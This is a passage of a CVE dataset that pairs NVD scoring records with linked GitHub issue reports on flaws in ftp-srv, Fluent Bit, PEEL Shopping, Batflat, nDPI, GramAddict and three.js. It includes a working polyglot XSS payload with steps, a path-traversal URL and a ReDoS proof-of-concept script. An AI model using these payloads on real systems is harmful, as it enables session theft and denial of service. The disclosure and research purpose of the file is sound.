0x0c4c80075950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==14==ABORTING
MS: 0 ; base unit: 0000000000000000000000000000000000000000
artifact_prefix='./'; Test unit written to ./crash-0dc6c277a5b5996e2eb49350577026f1820bb1e7 | write heap buffer overflow in dlt_buffer_write_block | https://api.github.com/repos/COVESA/dlt-daemon/issues/265/comments | 11 | 2020-11-02T18:38:23Z | 2023-05-19T03:36:10Z | https://github.com/COVESA/dlt-daemon/issues/265 | 734,733,134 | 265 | 1,702 |
CVE-2020-26299 | 2021-02-10T18:15:12.703 | ftp-srv is an open-source FTP server designed to be simple yet configurable. In ftp-srv before version 4.4.0 there is a path-traversal vulnerability. Clients of FTP servers utilizing ftp-srv hosted on Windows machines can escape the FTP user's defined root folder using the expected FTP commands, for example, CWD and UPDR. When windows separators exist within the path (`\`), `path.resolve` leaves the upper pointers intact and allows the user to move beyond the root folder defined for that user. We did not take that into account when creating the path resolve function. The issue is patched in version 4.4.0 (commit 457b859450a37cba10ff3c431eb4aa67771122e3). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.1,
"impactScore": 5.8,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/autovance/ftp-srv/commit/457b859450a37cba10ff3c431eb4aa67771122e3"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/autovance/ftp-srv/issues/167"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/autovance/ftp-srv/issues/225"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/autovance/ftp-srv/pull/224"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/autovance/ftp-srv/security/advisories/GHSA-pmw4-jgxx-pcq9"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://www.npmjs.com/package/ftp-srv"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/autovance/ftp-srv/commit/457b859450a37cba10ff3c431eb4aa67771122e3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/autovance/ftp-srv/issues/167"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/autovance/ftp-srv/issues/225"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/autovance/ftp-srv/pull/224"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/autovance/ftp-srv/security/advisories/GHSA-pmw4-jgxx-pcq9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://www.npmjs.com/package/ftp-srv"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ftp-srv_project:ftp-srv:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "AA72E811-17FD-45E1-AA69-CC4D4C677F45",
"versionEndExcluding": "4.4.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/autovance/ftp-srv/issues/167 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"autovance",
"ftp-srv"
] | Windows, default File System, root directory set in login event callback. User can browse parent directory using /../../ in URL.
Example:
`root: 'X:\\Project\\Storage\\User'`
URL `ftp://127.0.0.1/../../` becomes a command `CWD \/../../`
At line 30 in fs.js we have `nodePath.resolve('X:\Project\Storage\User', '.\\\..\..\')`
So _resolvePath() returns
```
{
clientPath: '\\..\..\',
fsPath: 'X:\Project'
}
```
| Windows: User can escape from root directory | https://api.github.com/repos/QuorumDMS/ftp-srv/issues/167/comments | 20 | 2019-07-17T12:56:53Z | 2021-11-30T19:50:33Z | https://github.com/QuorumDMS/ftp-srv/issues/167 | 469,177,567 | 167 | 1,703 |
CVE-2021-27186 | 2021-02-10T22:15:13.877 | Fluent Bit 1.6.10 has a NULL pointer dereference when an flb_malloc return value is not validated by flb_avro.c or http_server/api/v1/metrics.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/fluent/fluent-bit/issues/3044"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fluent/fluent-bit/pull/3045"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fluent/fluent-bit/pull/3047"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/fluent/fluent-bit/issues/3044"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fluent/fluent-bit/pull/3045"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fluent/fluent-bit/pull/3047"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:treasuredata:fluent_bit:1.6.10:*:*:*:*:*:*:*",
"matchCriteriaId": "20744F77-02AC-4F07-A359-27275282DCE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/fluent/fluent-bit/issues/3044 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"fluent",
"fluent-bit"
] | ## Bug Report
**Describe the bug**
<!--- A clear and concise description of what the bug is. -->
NULL dereference (value returned by flb_malloc is not checked) after memory allocation error (flb_malloc is wrapper on malloc returning NULL on unsuccessful allocation).
In most cases this issue will lead to crash via segmentation fault.
**Vulnerable Code**
```C
flb_sds_t flb_msgpack_raw_to_avro_sds(const void *in_buf, size_t in_size, struct flb_avro_fields *ctx)
{
msgpack_unpacked result;
msgpack_object *root;
size_t avro_buffer_size = in_size * 3;
char *out_buff = flb_malloc(avro_buffer_size);
.... SKIP.....
flb_debug("before avro_writer_memory\n");
awriter = avro_writer_memory(out_buff, avro_buffer_size);
if (awriter == NULL) {
```
**To Reproduce**
Problem was identified by source code review.
**Expected behavior**
<!--- A clear and concise description of what you expected to happen. -->
Memory allocation errors should be handled by checking value returned by flb_malloc().
**Your Environment**
<!--- Include as many relevant details about the environment you experienced the bug in -->
* Version used:
Current "master" branch
**Additional context**
<!--- How has this issue affected you? What are you trying to accomplish? -->
<!--- Providing context helps us come up with a solution that is most useful in the real world -->
See following recommendations for details:
https://wiki.sei.cmu.edu/confluence/display/c/ERR33-C.+Detect+and+handle+standard+library+errors | NULL dereference on memory allocation error (src/ flb_avro) | https://api.github.com/repos/fluent/fluent-bit/issues/3044/comments | 3 | 2021-02-09T06:49:52Z | 2021-02-11T07:43:43Z | https://github.com/fluent/fluent-bit/issues/3044 | 804,266,845 | 3,044 | 1,704 |
CVE-2021-27190 | 2021-02-12T03:15:12.883 | A Stored Cross Site Scripting(XSS) Vulnerability was discovered in PEEL SHOPPING 9.3.0 and 9.4.0, which are publicly available. The user supplied input containing polyglot payload is echoed back in javascript code in HTML response. This allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/advisto/peel-shopping/issues/4#issuecomment-953461611"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/vulf/Peel-Shopping-cart-9.4.0-Stored-XSS"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://www.peel-shopping.com/modules/telechargement/telecharger.php?id=7"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.secuneus.com/cve-2021-27190-peel-shopping-ecommerce-shopping-cart-stored-cross-site-scripting-vulnerability-in-address/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/advisto/peel-shopping/issues/4#issuecomment-953461611"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/vulf/Peel-Shopping-cart-9.4.0-Stored-XSS"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://www.peel-shopping.com/modules/telechargement/telecharger.php?id=7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.secuneus.com/cve-2021-27190-peel-shopping-ecommerce-shopping-cart-stored-cross-site-scripting-vulnerability-in-address/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:peel:peel_shopping:9.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8F6162D3-7FE6-4A81-8092-C639AB059B9C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:peel:peel_shopping:9.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "45FFE80C-0ABF-494F-9AE3-9A35E2535DC2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/advisto/peel-shopping/issues/4#issuecomment-953461611 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"advisto",
"peel-shopping"
] | ### [CVE-2021-27190](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27190) updated
## Vulnerability
Stored Cross Site Scripting (XSS) in the "Address" field of "http://localhost/peelshopping_9_4_0/utilisateurs/change_params.php"
## Affects
Peel Shopping 9.4.0
## Description
A Stored Cross Site Scripting attack occurs when a malicious script is injected directly into a vulnerable web application. Every time the infected page is viewed, the malicious script is transmitted to the victim’s browser.
In Peel Shopping 9.4.0, a user supplied polyglot payload in the "Address" field of the "Change my credentials" form (change_params.php) is echoed back in javascript code in HTML response. This allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
## Proof of Concept
1. Log in to your account
2. Navigate to the "Change my credentials" page (http://localhost/peel_9_4_0/utilisateurs/change_params.php)
3. Paste the below payload in the "Address" field
```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```
4. Click on "Change"
5. You will now get an alert box indicating that the malicious script has executed.
## References
You can refer to this repository for reference: https://github.com/vulf/Peel-Shopping-cart-9.4.0-Stored-XSS
You can find the Proof of Concept video at https://drive.google.com/file/d/1cngTLXe3Nf2tHozcYmvnxFRbK6_VWHkL/view?usp=sharing
## References for Mitigation Vulnerability
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
| Stored Cross site Scripting in "‘Address’" parameter (Peel Shopping 9.4.0) | https://api.github.com/repos/advisto/peel-shopping/issues/4/comments | 1 | 2021-10-26T04:08:24Z | 2021-11-10T07:59:13Z | https://github.com/advisto/peel-shopping/issues/4 | 1,035,802,896 | 4 | 1,705 |
CVE-2020-35734 | 2021-02-15T21:15:13.263 | Sruu.pl in Batflat 1.3.6 allows an authenticated user to perform code injection (and consequently Remote Code Execution) via the input fields of the Users tab. To exploit this, one must login to the administration panel and edit an arbitrary user's data (username, displayed name, etc.). NOTE: This vulnerability only affects products that are no longer supported by the maintainer | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://packetstormsecurity.com/files/161457/Batflat-CMS-1.3.6-Remote-Code-Execution.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://batflat.org/en/changelog"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/sruupl/batflat/issues/98"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://packetstormsecurity.com/files/161457/Batflat-CMS-1.3.6-Remote-Code-Execution.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://batflat.org/en/changelog"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/sruupl/batflat/issues/98"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:batflat:batflat:1.3.6:*:*:*:*:*:*:*",
"matchCriteriaId": "CCD502D1-2B27-4BC5-9DF2-C71F42212D85",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"94"
] | 94 | https://github.com/sruupl/batflat/issues/98 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"sruupl",
"batflat"
] | Users tab attributes aren't sanitized and some of them allow for code injection. This means that an authenticated user with access to Users tab can execute arbitrary code on the web server with application privileges.
Adding user with PHP code in "Displayed name" field:

PHP being executed:

| Code injection vulnerability in Batflat v1.3.6 Users tab | https://api.github.com/repos/sruupl/batflat/issues/98/comments | 2 | 2021-01-20T13:41:48Z | 2021-07-31T14:09:14Z | https://github.com/sruupl/batflat/issues/98 | 789,989,295 | 98 | 1,706 |
CVE-2020-25340 | 2021-02-16T15:15:13.197 | An issue was discovered in NFStream 5.2.0. Because some allocated modules are not correctly freed, if the nfstream object is directly destroyed without being used after it is created, it will cause a memory leak that may result in a local denial of service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ntop/nDPI/issues/994"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ntop/nDPI/issues/994"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nfstream:nfstream:5.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7C90CF7E-24AF-4023-9092-6A6C4530CBB8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/ntop/nDPI/issues/994 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ntop",
"nDPI"
] | I am using `nfstream` to detect traffic, and the `dissect` option is turned on, which means that nfstream will use `nDPI` to complete this task. But I encountered a **memory leak** problem during use. Nfstream is developed based on the python language, memory leaks are rarely encountered, so I started to locate the cause.
In nfstream, I located the reason for this line of code : [plugin.py](https://github.com/nfstream/nfstream/blob/a57358b40d00bfaba3bf7c2f026f8350b99d97c1/nfstream/plugin.py#L373). In fact, the code calls the `ndpi_flow_free()` function in nDPI: [ndpi_main.c](https://github.com/ntop/nDPI/blob/5e1bb0dbc12f779151d386c63d7b7992b5940006/src/lib/ndpi_main.c#L6225). By comparing the memory release operation in [ndpi_flow_free()](https://github.com/ntop/nDPI/blob/5e1bb0dbc12f779151d386c63d7b7992b5940006/src/lib/ndpi_main.c#L6225) and the [prototype of the ndpi_flow_struct structure](https://github.com/ntop/nDPI/blob/5e1bb0dbc12f779151d386c63d7b7992b5940006/src/include/ndpi_typedefs.h#L1148), I think that ndpi_flow_free() has not completely released all the variables in ndpi_flow_struct.
I think this may be the root cause of the memory leak.
| Memory leak in ndpi_free_flow() | https://api.github.com/repos/ntop/nDPI/issues/994/comments | 5 | 2020-08-26T08:51:21Z | 2020-08-27T21:12:47Z | https://github.com/ntop/nDPI/issues/994 | 686,137,898 | 994 | 1,707 |
CVE-2020-36245 | 2021-02-17T22:15:12.633 | GramAddict through 1.2.3 allows remote attackers to execute arbitrary code because of use of UIAutomator2 and ATX-Agent. The attacker must be able to reach TCP port 7912, e.g., by being on the same Wi-Fi network. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/GramAddict/bot/issues/134"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/GramAddict/bot/issues/134"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gramaddict:gramaddict:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2A4A6AB8-C6B0-45DA-9D04-BAFDB59259F7",
"versionEndExcluding": null,
"versionEndIncluding": "1.2.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"306"
] | 306 | https://github.com/GramAddict/bot/issues/134 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"GramAddict",
"bot"
] | I discovered something very concerning just now.
When using [uiautomator2](https://github.com/openatx/uiautomator2), which is what GramAddict is based around, it silently installs the application [ATX-Agent](https://github.com/openatx/atx-agent) on your device, which opens a webserver on TCP port 7912, that lets anyone on the network, with **ZERO** form of authentication, execute code, install apps, exfiltrate private data etc. on your device and view the screen remotely.
As soon as you're running GramAddict, this webserver is started. This is a ***HUGE security concern***, and should be addressed immediately!
Try it yourself:
1. Find the Wi-Fi IP address of your device:
`adb shell ip route | awk '{print $9}'`
(NOTE: It is trivial for anyone on the same network to discover your device and the running webserver)
2. Run GramAddict as ususal.
3. Using another device on the same network, go to `http://[PHONE IP]:7912` in your browser.
This is what you're presented with:
<img width="375" alt="image" src="https://user-images.githubusercontent.com/16690056/101473947-5dd81880-3942-11eb-8df6-3b4a20169300.png">
<img width="416" alt="image" src="https://user-images.githubusercontent.com/16690056/101474138-a68fd180-3942-11eb-9a92-be512cf1f357.png">
_(censored for my privacy)_
<img width="417" alt="image" src="https://user-images.githubusercontent.com/16690056/101474410-08e8d200-3943-11eb-83d7-a0579e1b9365.png">
(Not showing the API page, as it exposes too much personal info. You can view its endpoints and capabilities at the ATX Agent page linked above)
This is extremely worrying! | UIAutomator2 lets anyone on the network control/view your device! | https://api.github.com/repos/GramAddict/bot/issues/134/comments | 18 | 2020-12-08T10:55:40Z | 2021-03-19T15:51:07Z | https://github.com/GramAddict/bot/issues/134 | 759,345,639 | 134 | 1,708 |
CVE-2020-28496 | 2021-02-18T15:15:13.360 | This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms") | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
